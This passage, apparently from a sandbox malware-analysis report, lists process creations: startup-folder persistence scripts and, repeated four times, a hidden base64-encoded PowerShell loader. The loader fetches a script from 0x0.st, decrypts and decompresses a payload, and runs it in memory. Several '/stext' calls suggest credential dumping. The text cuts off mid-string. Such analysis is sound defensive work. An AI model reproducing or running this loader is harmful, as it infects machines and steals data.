                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92Y